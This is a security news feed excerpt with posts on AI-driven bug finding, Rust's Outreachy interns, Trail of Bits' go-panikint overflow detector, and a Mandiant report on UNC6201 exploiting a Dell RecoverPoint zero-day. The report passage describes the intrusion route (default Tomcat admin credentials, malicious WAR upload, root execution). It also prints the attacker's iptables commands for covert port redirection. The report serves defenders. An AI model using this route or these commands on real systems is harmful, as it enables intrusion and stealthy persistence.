<p>This can feel terrifying in the immediate term, but it’s ultimately great news for defenders. A gap between machine-discoverable and human-discoverable bugs favors the attacker, who can concentrate many months of costly human effort to find a single bug. Closing this gap erodes the attacker’s long-term advantage by making all discoveries cheap.</p>



<p><strong>Encouragingly, we also haven’t seen any bugs that <em>couldn’t</em> have been found by an elite human researcher.</strong> Some commentators predict that future AI models will unearth entirely new forms of vulnerabilities that defy our current comprehension, but we don’t think so. Software like Firefox is designed in a modular way for humans to be able to reason about its correctness. It is complex, but not arbitrarily complex<sup>1</sup>.</p>



<p>The defects are finite, and we are entering a world where we can finally find them all.</p>



<hr class="wp-block-separator has-alpha-channel-opacity">



<p class="has-small-font-size"><sup>1 </sup> There’s a risk that codebases begin to surpass human comprehension as a result of more AI in the development process, scaling bug complexity along with (or perhaps faster than) discovery capability. Human-comprehensibility is an essential property to maintain, especially in critical software like browsers and operating systems.</p>
<p>The post <a href="https://blog.mozilla.org/en/privacy-security/ai-security-zero-day-vulnerabilities/">The zero-days are numbered </a> appeared first on <a href="https://blog.mozilla.org/en/">The Mozilla Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Rust Programming Language Blog: Rust is participating in Outreachy]]></title>
<description><![CDATA[The Rust Project has been building up a good history of participating in various open-source mentorship programs, including Google Summer of Code for three years (including this year) and previously OSPP. We're happy to announce that this year we are also participating in Outreachy starting in th...]]></description>
<link>https://tsecurity.de/de/3501621/tools/the-rust-programming-language-blog-rust-is-participating-in-outreachy/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3501621/tools/the-rust-programming-language-blog-rust-is-participating-in-outreachy/</guid>
<pubDate>Fri, 08 May 2026 23:24:14 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The Rust Project has been building up a good history of participating in various open-source mentorship programs, including <a href="https://blog.rust-lang.org/2026/04/30/gsoc-2026-selected-projects/" rel="external">Google Summer of Code</a> for three years (including this year) and <a href="https://blog.rust-lang.org/2024/05/07/OSPP-2024/" rel="external">previously OSPP</a>. We're happy to announce that this year we are also participating in <a href="https://www.outreachy.org/" rel="external">Outreachy</a> starting in the May 2026 cohort.</p>
<p>Each of these mentorship programs has different criteria for eligibility depending on who they target and the motivations of the program. Outreachy provides internships in open source, to people from any background who face underrepresentation, systemic bias, or discrimination in the technical industry where they are living. You can learn more about the Outreachy program <a href="https://www.outreachy.org/" rel="external">on their website</a>.</p>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/05/04/outreachy-2026-may/#what-is-outreachy-and-how-is-it-different-than-google-summer-of-code"></a>
What is Outreachy and how is it different than Google Summer of Code</h3>
<p>Outreachy is similar to Google Summer of Code (GSoC) in some aspects, but different in others. First off, unlike GSoC, Outreachy interns first apply to the overall program and only <em>then</em> can apply to specific communities. Second, while oftentimes GSoC applicants submit various contributions prior to their application, Outreachy has a dedicated period where contributions are not just optional, but required. Finally, Outreachy applicants submit an application similar to GSoC applications and communities pick interns based on those applications and the interns' contributions. Outreachy has two internship periods per year, one running from May to August (in which we are currently participating) and one from December to March.</p>
<p>The other major difference between Google Summer of Code and Outreachy is the source of intern stipends. For GSoC, Google graciously covers contributor stipends and overhead. For Outreachy, communities instead cover the interns' stipends and overhead.</p>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/05/04/outreachy-2026-may/#we-are-mentoring-4-interns-for-the-may-2026-cohort"></a>
We are mentoring 4 interns for the May 2026 cohort</h3>
<p>Because of limited funding availability and mentoring capacity, the Rust Project decided to select four interns for mentorship. We'll briefly share these projects below.</p>
<h4><a class="anchor" href="https://blog.rust-lang.org/2026/05/04/outreachy-2026-may/#calling-overloaded-c-functions-from-rust"></a>
Calling overloaded C++ functions from Rust</h4>
<p><a href="https://www.github.com/Ajay-singh1" rel="external">Ajay Singh</a> has been selected, mentored by <a href="https://github.com/teor2345" rel="external">teor</a>, <a href="https://github.com/cramertj" rel="external">Taylor Cramer</a>, and <a href="https://github.com/thunderseethe" rel="external">Ethan Smith</a>.</p>
<p>This project aims to implement an experimental feature for calling overloaded C++ functions from Rust, and to begin testing that feature in a few representative use cases.</p>
<h4><a class="anchor" href="https://blog.rust-lang.org/2026/05/04/outreachy-2026-may/#code-coverage-of-the-rust-compiler-at-scale"></a>
Code coverage of the Rust compiler at scale</h4>
<p><a href="https://github.com/akintewe" rel="external">Akintewe Oluwasola</a> has been selected, mentored by <a href="https://github.com/jackh726/" rel="external">Jack Huey</a>.</p>
<p>This project aims to develop the workflows to run and analyze code coverage of the compiler at the scale of the entire compiler test suite and on ecosystem crates detected by crater. The hope is to be able to detect when the compiler is inadequately tested, both within the compiler and in the ecosystem, and to build tools to do continuous analysis on this.</p>
<h4><a class="anchor" href="https://blog.rust-lang.org/2026/05/04/outreachy-2026-may/#fuzzing-the-a-mir-formality-type-system-implementation"></a>
Fuzzing the a-mir-formality type system implementation</h4>
<p><a href="https://github.com/System625" rel="external">Tunde-Ajayi Olamiposi</a> has been selected, mentored by <a href="https://github.com/nikomatsakis/" rel="external">Niko Matsakis</a>, <a href="https://github.com/lqd/" rel="external">Rémy Rakic</a>, and <a href="https://github.com/tiif" rel="external">tiif</a>.</p>
<p>This project aims to implement fuzzing for <a href="https://github.com/rust-lang/a-mir-formality/" rel="external">a-mir-formality</a>, an in-progress model for Rust's type and trait system.  The goal is to generate programs in order to identify rules with underspecified semantics in a-mir-formality.</p>
<h4><a class="anchor" href="https://blog.rust-lang.org/2026/05/04/outreachy-2026-may/#improve-the-security-of-github-actions-of-the-rust-project"></a>
Improve the security of GitHub Actions of the Rust Project</h4>
<p><a href="https://github.com/rukysandy" rel="external">oghenerukevwe Sandra Idjighere</a> has been selected, mentored by <a href="https://github.com/marcoieni" rel="external">Marco Ieni</a> and <a href="https://github.com/ubiratansoares" rel="external">Ubiratan Soares</a>.</p>
<p>This project aims to improve the security of GitHub Actions workflows of the repositories owned by the Rust Project. It will develop tools and workflows, integrating with existing software, to analyze Github repositories and detect if they follow the best security practices, fix existing issues, and ensure that good security practices are followed in the future.</p>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/05/04/outreachy-2026-may/#what-s-next"></a>
What's next</h3>
<p>Over the next 3 months, the interns will work closely with their mentors to make progress on their projects. When the internship period is over, we'll write another blog post to share the results! See you then!</p>
<p>We also want to thank all the people that submitted applications and made contributions. It was quite tough to decide which applicants to select. Hopefully we will participate in Outreachy again in the future and there are other opportunities to participate. We also very much welcome you to stick around and continue being involved - there is a ton of places in the Rust Project with opportunities to be involved.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Detect Go’s silent arithmetic bugs with go-panikint]]></title>
<description><![CDATA[Go’s arithmetic operations on standard integer types are silent by default, meaning overflows “wrap around” without panicking. This behavior has hidden an entire class of security vulnerabilities from fuzzing campaigns. Today we’re changing that by releasing go-panikint, a modified Go compiler th...]]></description>
<link>https://tsecurity.de/de/3501447/it-security-nachrichten/detect-gos-silent-arithmetic-bugs-with-go-panikint/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3501447/it-security-nachrichten/detect-gos-silent-arithmetic-bugs-with-go-panikint/</guid>
<pubDate>Fri, 08 May 2026 23:20:31 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Go’s arithmetic operations on standard integer types are silent by default, meaning overflows “wrap around” without panicking. This behavior has hidden an entire class of security vulnerabilities from fuzzing campaigns. Today we’re changing that by releasing <a href="https://github.com/trailofbits/go-panikint">go-panikint</a>, a modified Go compiler that turns silent integer overflows into explicit panics. We used it to find a live integer overflow in the Cosmos SDK’s RPC pagination logic, showing how this approach eliminates a major blind spot for anyone fuzzing Go projects. (The issue in the Cosmos SDK has not been fixed, but a <a href="https://github.com/cosmos/cosmos-sdk/pull/25049">pull request</a> has been created to mitigate it.)</p>
<h2>The sound of silence</h2>
<p>In Rust, debug builds are designed to panic on integer overflow, a feature that is highly valuable for fuzzing. Go, however, takes a different approach. In Go, arithmetic overflows on standard integer types are silent by default. The operations simply “wrap around,” which can be a risky behavior and a potential source of serious vulnerabilities.</p>
<p>This is not an oversight but a deliberate, long-debated <a href="https://github.com/golang/go/issues/30613">design choice</a> in the Go community. While Go’s memory safety prevents entire classes of vulnerabilities, its integers are not safe from overflow. Unchecked arithmetic operations can lead to logic bugs that bypass critical security checks.</p>
<p>Of course, static analysis tools can identify potential integer overflows. The problem is that they often produce a high number of false positives. It’s difficult to know if a flagged line of code is truly reachable by an attacker or if the overflow is actually harmless due to mitigating checks in the surrounding code. Fuzzing, on the other hand, provides a definitive answer: if you can trigger it with a fuzzer, the bug is real and reachable. However, the problem remained that Go’s default behavior wouldn’t cause a crash, letting these bugs go undetected.</p>
<h2>How go-panikint works</h2>
<p>To solve this, we forked the Go compiler and modified its backend. The <a href="https://github.com/trailofbits/go-panikint/blob/eb29f694a03fbe38df5ab618acdd0f8b75d4ddd8/src/cmd/compile/internal/ssagen/ssa.go#L5320-L5987">core</a> of go-panikint’s functionality is injected during the compiler’s conversion of code into <a href="https://en.wikipedia.org/wiki/Static_single-assignment_form">Static Single Assignment</a> (SSA) form, a lower-level intermediate representation (IR). At this stage, for every mathematical operation, our compiler inserts additional checks. If one of these checks fails at runtime, it triggers a panic with a detailed error message. These runtime checks are compiled directly into the final binary.</p>
<p>In addition to arithmetic overflows, go-panikint can also detect integer truncation issues, where converting a value to a smaller integer type causes data loss. Here’s an example:</p>
<figure class="highlight">
 <pre tabindex="0" class="chroma"><code class="language-go" data-lang="go"><span class="line"><span class="cl"><span class="kd">var</span><span class="w"> </span><span class="nx">x</span><span class="w"> </span><span class="kt">uint16</span><span class="w"> </span><span class="p">=</span><span class="w"> </span><span class="mi">256</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="nx">result</span><span class="w"> </span><span class="o">:=</span><span class="w"> </span><span class="nb">uint8</span><span class="p">(</span><span class="nx">x</span><span class="p">)</span><span class="w"> </span></span></span></code></pre>
 <figcaption><span>Figure 1: Conversion leading to data loss due to unsafe casting</span></figcaption>
</figure>
<p>While this feature is functional, we found that it generated false positives during our fuzzing campaigns. For this reason, we will not investigate further and will focus on arithmetic issues.</p>
<p>Let’s analyze the checks for a program that adds up two numbers. If we compile this program and then decompile it, we can clearly see how these checks are inserted. Here, the <code>if</code> condition is used to detect signed integer overflow:</p>
<ul>
<li>
<p>Case 1: Both operands are negative. The result should also be negative. If instead the result (<code>sVar23</code>) becomes larger (less negative or even positive), this indicates signed overflow.</p>
</li>
<li>
<p>Case 2: Both operands are non-negative. The result should be greater than or equal to each operand. If instead the result becomes smaller than one operand, this indicates signed overflow.</p>
</li>
<li>
<p>Case 3: Only one operand is negative. In this case, signed overflow cannot occur.</p>
</li>
</ul>
<figure class="highlight">
 <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="k">if</span> <span class="p">(</span><span class="o">*</span><span class="n">x_00</span> <span class="o">==</span> <span class="sc">'+'</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl"> <span class="n">val</span> <span class="o">=</span> <span class="p">(</span><span class="n">uint32</span><span class="p">)</span><span class="o">*</span><span class="p">(</span><span class="n">undefined8</span> <span class="o">*</span><span class="p">)(</span><span class="n">puVar9</span> <span class="o">+</span> <span class="mh">0x60</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"> <span class="n">sVar23</span> <span class="o">=</span> <span class="n">val</span> <span class="o">+</span> <span class="n">sVar21</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="n">puVar17</span> <span class="o">=</span> <span class="n">puVar9</span> <span class="o">+</span> <span class="mi">8</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(((</span><span class="n">sdword</span><span class="p">)</span><span class="n">val</span> <span class="o">&lt;</span> <span class="mi">0</span> <span class="o">&amp;&amp;</span> <span class="n">sVar21</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="n">sdword</span><span class="p">)</span><span class="n">val</span> <span class="o">&lt;</span> <span class="n">sVar23</span> <span class="o">||</span>
</span></span><span class="line"><span class="cl"> <span class="p">((</span><span class="n">sdword</span><span class="p">)</span><span class="n">val</span> <span class="o">&gt;=</span> <span class="mi">0</span> <span class="o">&amp;&amp;</span> <span class="n">sVar21</span> <span class="o">&gt;=</span> <span class="mi">0</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="n">sVar23</span> <span class="o">&lt;</span> <span class="p">(</span><span class="n">sdword</span><span class="p">)</span><span class="n">val</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl"> <span class="n">runtime</span><span class="p">.</span><span class="nf">panicoverflow</span><span class="p">();</span> <span class="c1">// &lt;-- panic if overflow caught
</span></span></span><span class="line"><span class="cl"><span class="c1"></span> <span class="p">}</span>
</span></span><span class="line"><span class="cl"> <span class="k">goto</span> <span class="n">LAB_1000a10d4</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span></span></span></code></pre>
 <figcaption><span>Figure 2: Example of a decompiled multiplication from a Go program</span></figcaption>
</figure>
<p>Using go-panikint is straightforward. You simply compile the tool and then use the resulting Go binary in place of the official one. All other commands and build processes remain exactly the same, making it easy to integrate into existing workflows.</p>
<figure class="highlight">
 <pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">git clone https://github.com/trailofbits/go-panikint
</span></span><span class="line"><span class="cl"><span class="nb">cd</span> go-panikint/src <span class="o">&amp;&amp;</span> ./make.bash
</span></span><span class="line"><span class="cl"><span class="nb">export</span> <span class="nv">GOROOT</span><span class="o">=</span>/path/to/go-panikint <span class="c1"># path to the root of go-panikint</span>
</span></span><span class="line"><span class="cl">./bin/go <span class="nb">test</span> -fuzz<span class="o">=</span>FuzzIntegerOverflow <span class="c1"># fuzz our harness</span></span></span></code></pre>
 <figcaption><span>Figure 3: Installation and usage of go-panikint</span></figcaption>
</figure>
<p>Let’s try with a very simple program. This program has no fuzzing harness, only a main function to execute for illustration purposes.</p>
<figure class="highlight">
 <pre tabindex="0" class="chroma"><code class="language-go" data-lang="go"><span class="line"><span class="cl"><span class="kn">package</span><span class="w"> </span><span class="nx">main</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="kn">import</span><span class="w"> </span><span class="s">"fmt"</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="kd">func</span><span class="w"> </span><span class="nf">main</span><span class="p">()</span><span class="w"> </span><span class="p">{</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="kd">var</span><span class="w"> </span><span class="nx">a</span><span class="w"> </span><span class="kt">int8</span><span class="w"> </span><span class="p">=</span><span class="w"> </span><span class="mi">120</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="kd">var</span><span class="w"> </span><span class="nx">b</span><span class="w"> </span><span class="kt">int8</span><span class="w"> </span><span class="p">=</span><span class="w"> </span><span class="mi">20</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nx">result</span><span class="w"> </span><span class="o">:=</span><span class="w"> </span><span class="nx">a</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="nx">b</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nx">fmt</span><span class="p">.</span><span class="nf">Printf</span><span class="p">(</span><span class="s">"%d + %d = %d\n"</span><span class="p">,</span><span class="w"> </span><span class="nx">a</span><span class="p">,</span><span class="w"> </span><span class="nx">b</span><span class="p">,</span><span class="w"> </span><span class="nx">result</span><span class="p">)</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="p">}</span></span></span></code></pre>
 <figcaption><span>Figure 4: Simple integer overflow bug</span></figcaption>
</figure>
<figure class="highlight">
 <pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">$ go run poc.go <span class="c1"># native compiler </span>
</span></span><span class="line"><span class="cl"><span class="m">120</span> + <span class="nv">20</span> <span class="o">=</span> -116
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">$ <span class="nv">GOROOT</span><span class="o">=</span><span class="nv">$pwd</span> ./bin/go run poc.go <span class="c1"># go-panikint</span>
</span></span><span class="line"><span class="cl">panic: runtime error: integer overflow in int8 addition operation
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">goroutine <span class="m">1</span> <span class="o">[</span>running<span class="o">]</span>:
</span></span><span class="line"><span class="cl">main.main<span class="o">()</span>
</span></span><span class="line"><span class="cl">	./go-panikint/poc.go:8 +0xb8
</span></span><span class="line"><span class="cl"><span class="nb">exit</span> status <span class="m">2</span></span></span></code></pre>
 <figcaption><span>Figure 5: Running poc.go with both compilers</span></figcaption>
</figure>
<p>However, not all overflows are bugs; some are intentional, especially in low-level code like the Go compiler itself, used for randomness or cryptographic algorithms. To handle these cases, we built two filtering mechanisms:</p>
<ol>
<li>
<p>Source-location-based filtering: This allows us to ignore known, intentional overflows within the Go compiler’s own source code by whitelisting some given file paths.</p>
</li>
<li>
<p>In-code comments: Any arithmetic operation can be marked as a non-issue by adding a simple comment, like <code>// overflow_false_positive</code> or <code>// truncation_false_positive</code>. This prevents <code>go-panikint</code> from panicking on code that relies on wrapping behavior.</p>
</li>
</ol>
<h2>Finding a real-world bug</h2>
<p>To validate our tool, we used it in a fuzzing campaign against the Cosmos SDK and discovered an <a href="https://github.com/cosmos/cosmos-sdk/issues/25006">integer overflow vulnerability</a> in the RPC pagination logic. When the sum of the offset and limit parameters in a query exceeded the maximum value for a <code>uint64</code>, the query would return an empty list of validators instead of the expected set.</p>
<figure class="highlight">
 <pre tabindex="0" class="chroma"><code class="language-go" data-lang="go"><span class="line"><span class="cl"><span class="c1">// Paginate does pagination of all the results in the PrefixStore based on the</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="c1">// provided PageRequest. onResult should be used to do actual unmarshaling.</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="kd">func</span><span class="w"> </span><span class="nf">Paginate</span><span class="p">(</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w">	</span><span class="nx">prefixStore</span><span class="w"> </span><span class="nx">types</span><span class="p">.</span><span class="nx">KVStore</span><span class="p">,</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w">	</span><span class="nx">pageRequest</span><span class="w"> </span><span class="o">*</span><span class="nx">PageRequest</span><span class="p">,</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w">	</span><span class="nx">onResult</span><span class="w"> </span><span class="kd">func</span><span class="p">(</span><span class="nx">key</span><span class="p">,</span><span class="w"> </span><span class="nx">value</span><span class="w"> </span><span class="p">[]</span><span class="kt">byte</span><span class="p">)</span><span class="w"> </span><span class="kt">error</span><span class="p">,</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="p">)</span><span class="w"> </span><span class="p">(</span><span class="o">*</span><span class="nx">PageResponse</span><span class="p">,</span><span class="w"> </span><span class="kt">error</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="o">...</span><span class="w"> 
</span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="nx">end</span><span class="w"> </span><span class="o">:=</span><span class="w"> </span><span class="nx">pageRequest</span><span class="p">.</span><span class="nx">Offset</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="nx">pageRequest</span><span class="p">.</span><span class="nx">Limit</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="o">...</span><span class="w"> </span></span></span></code></pre>
 <figcaption><span>Figure 6: end can overflow uint64 and return an empty validator list if user provides a large Offset</span></figcaption>
</figure>
<p>This finding demonstrates the power of combining fuzzing with runtime checks: <code>go-panikint</code> turned the silent overflow into a clear panic, which the fuzzer reported as a crash with a reproducible test case. A <a href="https://github.com/cosmos/cosmos-sdk/pull/25049">pull request</a> has been created to mitigate the issue.</p>
<h2>Use cases for researchers and developers</h2>
<p>We built <code>go-panikint</code> with two main use cases in mind:</p>
<ol>
<li>
<p><strong>Security research and fuzzing:</strong> For security researchers, <code>go-panikint</code> is a great new tool for bug discovery. By simply replacing the Go compiler in a fuzzing environment, researchers can uncover two whole new classes of vulnerabilities that were previously invisible to dynamic analysis.</p>
</li>
<li>
<p><strong>Continuous deployment and integration:</strong> Developers can integrate <code>go-panikint</code> into their CI/CD pipelines and potentially uncover bugs that standard test runs would miss.</p>
</li>
</ol>
<p>We invite the community to try <code>go-panikint</code> on your own projects, integrate it into your CI pipelines, and help us uncover the next wave of hidden arithmetic bugs.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[From BRICKSTORM to GRIMBOLT: UNC6201 Exploiting a Dell RecoverPoint for Virtual Machines Zero-Day]]></title>
<description><![CDATA[Written by: Peter Ukhanov, Daniel Sislo, Nick Harbour, John Scarbrough, Fernando Tomlinson, Jr., Rich Reece

Introduction 
Mandiant and Google Threat Intelligence Group (GTIG) have identified the zero-day exploitation of a high-risk vulnerability in Dell RecoverPoint for Virtual Machines, tracked...]]></description>
<link>https://tsecurity.de/de/3501431/it-security-nachrichten/from-brickstorm-to-grimbolt-unc6201-exploiting-a-dell-recoverpoint-for-virtual-machines-zero-day/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3501431/it-security-nachrichten/from-brickstorm-to-grimbolt-unc6201-exploiting-a-dell-recoverpoint-for-virtual-machines-zero-day/</guid>
<pubDate>Fri, 08 May 2026 23:20:10 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph_advanced"><p>Written by: Peter Ukhanov, Daniel Sislo, Nick Harbour, John Scarbrough, Fernando Tomlinson, Jr., Rich Reece</p>
<hr></div>
<div class="block-paragraph_advanced"><h3><span>Introduction</span><strong> </strong></h3>
<p><span>Mandiant and Google Threat Intelligence Group (GTIG) have identified the zero-day exploitation of a high-risk vulnerability in </span><a href="https://www.dell.com/en-us/lp/dt/data-protection-suite-recoverpoint-for-virtual-machines" rel="noopener" target="_blank"><span>Dell RecoverPoint </span><span>for Virtual Machines</span></a><span>, tracked as CVE-2026-22769</span>, <span>with a CVSSv3.1 score of 10.0</span><span>. Analysis of incident response engagements revealed that UNC6201,</span><span> a suspected PRC-nexus threat cluster, has exploited this flaw since at least mid-2024 to move laterally, maintain persistent access, and deploy malware including SLAYSTYLE, BRICKSTORM,</span><span> and a novel backdoor tracked as GRIMBOLT.</span><span> The initial access vector for these incidents was not confirmed, but <span>UNC6201</span></span><span> is known to target edge appliances (such as VPN concentrators) for initial access. There are notable overlaps between <span>UNC6201</span></span><span> and UNC5221,</span><span> which has been used synonymously with the actor publicly reported as Silk Typhoon, although GTIG does not currently consider the two clusters to be the same.</span></p>
<p><span>This report builds on </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign"><span>previous GTIG research</span></a><span> into <span>BRICKSTORM</span></span><span> espionage activity, providing a technical deep dive into the exploitation of <span>CVE-2026-22769</span></span><span> and the functionality of the <span>GRIMBOLT</span></span><span> malware. Mandiant identified a campaign featuring the replacement of older <span>BRICKSTORM</span></span><span> binaries with <span>GRIMBOLT</span></span><span> in September 2025. <span>GRIMBOLT</span></span><span> represents a shift in tradecraft; this newly identified malware, written in C# and compiled using native ahead-of-time (AOT) compilation, is designed to complicate static analysis and enhance performance on resource-constrained appliances.</span></p>
<p><span>Beyond the Dell appliance exploitation, Mandiant observed the actor employing novel tactics to pivot into VMware virtual infrastructure, including the creation of "Ghost NICs" for stealthy network pivoting and the use of iptables for Single Packet Authorization (SPA).</span></p>
<p><span>Dell has released </span><span>remediations</span><span> for <span>CVE-2026-22769</span></span><span>, and customers are urged to follow the guidance in the official </span><a href="https://www.dell.com/support/kbdoc/en-us/000426773" rel="noopener" target="_blank"><span>Security Advisory</span></a><span>. This post provides actionable hardening guidance, detection opportunities, and a technical analysis of the <span><span>UNC6201</span></span></span><span> tactics, techniques, and procedures (TTPs).</span></p>
<h3><span>GRIMBOLT</span></h3>
<p><span>During analysis of compromised Dell RecoverPoint </span><span>for Virtual Machines</span><span>, Mandiant discovered the presence of <span><span>BRICKSTORM</span></span></span><span> binaries and the subsequent replacement of these binaries with <span><span>GRIMBOLT</span></span></span><span> in September 2025. <span><span>GRIMBOLT</span></span></span><span> is a C#-written foothold backdoor compiled using native ahead-of-time (AOT) compilation and packed with </span><code>UPX</code><span>. It provides a remote shell capability and uses the same command and control as previously deployed <span><span>BRICKSTORM</span></span></span><span> payload. </span><span>It's unclear if the threat actor's replacement of <span><span>BRICKSTORM</span></span></span><span> with <span><span>GRIMBOLT</span></span></span><span> was part of a pre-planned life cycle iteration by the threat actor or a reaction to incident response efforts led by Mandiant and other industry partner</span><span>s. </span><span>Unlike traditional .NET software that uses just-in-time (JIT) compilation at runtime, Native AOT-compiled binaries, introduced to .NET in 2022, are converted directly to machine-native code during compilation. This approach enhances the software’s performance on resource-constrained appliances, ensures required libraries are already present in the file, and complicates static analysis by removing the common intermediate language (CIL) metadata typically associated with C# samples.</span></p>
<p><span><span><span><span><span>UNC6201</span></span></span> established <span><span>BRICKSTORM</span></span></span><span> and <span><span>GRIMBOLT</span></span></span><span> persistence on the Dell RecoverPoint for Virtual Machines by modifying a legitimate shell script named </span><code>convert_hosts.sh</code><span> to include the path to the backdoor. This shell script is executed by the appliance at boot time via </span><code>rc.local</code><span>.</span></span></p>
<h3><span>CVE-2026-22769</span></h3>
<p><span>Mandiant discovered <span><span>CVE-2026-22769</span></span></span><span> while investigating multiple Dell RecoverPoint </span><span>for Virtual Machines</span><span> within a victim’s environment that had active C2 associated with <span><span><span><span>BRICKSTORM</span></span></span></span></span><span> and <span><span>GRIMBOLT</span></span></span><span> backdoors. During analysis of the appliances, analysts identified multiple web requests to an appliance prior to compromise using the username </span><code>admin</code><span>. These requests were directed to the installed Apache Tomcat Manager, used to deploy various components of the Dell RecoverPoint software, and resulted in the deployment of a malicious WAR file containing a <span>SLAYSTYLE</span></span><span> web shell.</span></p>
<p><span>After analyzing various configuration files belonging to Tomcat Manager, we identified a set of hard-coded default credentials for the </span><code>admin</code><span> user in </span><code>/home/kos/tomcat9/tomcat-users.xml</code><span>. Using these credentials, a threat actor could authenticate to the Dell RecoverPoint Tomcat Manager, upload a malicious WAR file using the </span><code>/manager/text/deploy</code><span> endpoint, and then execute commands as </span><code>root</code><span> on the appliance.</span></p>
<p><span>The earliest identified exploitation activity of this vulnerability occurred in mid-2024.</span></p>
<h3><span>Newly Observed VMware Activity</span></h3>
<p><span>During the course of the recent investigations, Mandiant observed continued compromise of VMware virtual infrastructure by the threat actor as previously reported by </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign"><span>Mandiant</span></a><span>, </span><a href="https://www.crowdstrike.com/en-us/blog/warp-panda-cloud-threats/" rel="noopener" target="_blank"><span>CrowdStrike</span></a><span>, and </span><a href="https://www.cisa.gov/news-events/analysis-reports/ar25-338a" rel="noopener" target="_blank"><span>CISA</span></a><span>. Additionally, several new TTPs were discovered that haven’t been previously reported on.</span></p>
<h4><span>Ghost NICs</span></h4>
<p><span>Mandiant discovered the threat actor creating new temporary network ports on existing virtual machines running on an ESXi server. Using these network ports, the threat actor then pivoted to various internal and software-as-a-service (SaaS) infrastructures used by the affected organizations.</span></p>
<h4><span>iptables proxying</span></h4>
<p><span>While analyzing compromised vCenter appliances, Mandiant recovered several commands from Systemd Journal executed by the threat actor using a deployed <span>SLAYSTYLE</span></span><span> web shell. These iptable commands were used for Single Packet Authorization and consisted of:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Monitoring incoming traffic on port 443 for a specific HEX string</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Adding the source IP of that traffic to a list and if the IP is on the list and connects to port 10443, the connection is ACCEPTED</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Once the initial approved traffic comes in to port 10443, any subsequent traffic is automatically redirected</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>For the next 300 seconds (five minutes), any traffic to port 443 is silently redirected to port 10443 if the IP is on the approved list</span></p>
</li>
</ul></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>iptables -I INPUT -i eth0 -p tcp --dport 443 -m string --hex-string &lt;HEX_STRING&gt;
iptables -A port_filter -i eth0 -p tcp --dport 10443 --syn -m recent --rcheck --name ipt -j ACCEPT
iptables -t nat -N IPT
iptables -t nat -A IPT -p tcp -j REDIRECT --to-ports 10443
iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 --syn -m recent --rcheck --name ipt --seconds 300 -j IPT</code></pre></div>
<div class="block-paragraph_advanced"><h3><span>Remediation</span></h3>
<p><span>The following investigative guide can assist defenders in analyzing Dell RecoverPoint </span><span>for Virtual Machines</span><span>. </span></p>
<h4><span>Forensic Analysis of Dell RecoverPoint Disk Image</span></h4>
<p><span>The following artifacts are high-value sources of evidence for incident responders conducting full disk image analysis of Dell RecoverPoint </span><span>for Virtual Machines</span><span>.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Web logs for Tomcat Manager are stored in </span><code>/home/kos/auditlog/fapi_cl_audit_log.log</code><span>. Check log file for any instances of requests to </span><code>/manager</code><span>. Any instances of those requests should be considered suspicious</span></p>
</li>
<ul>
<li aria-level="2">
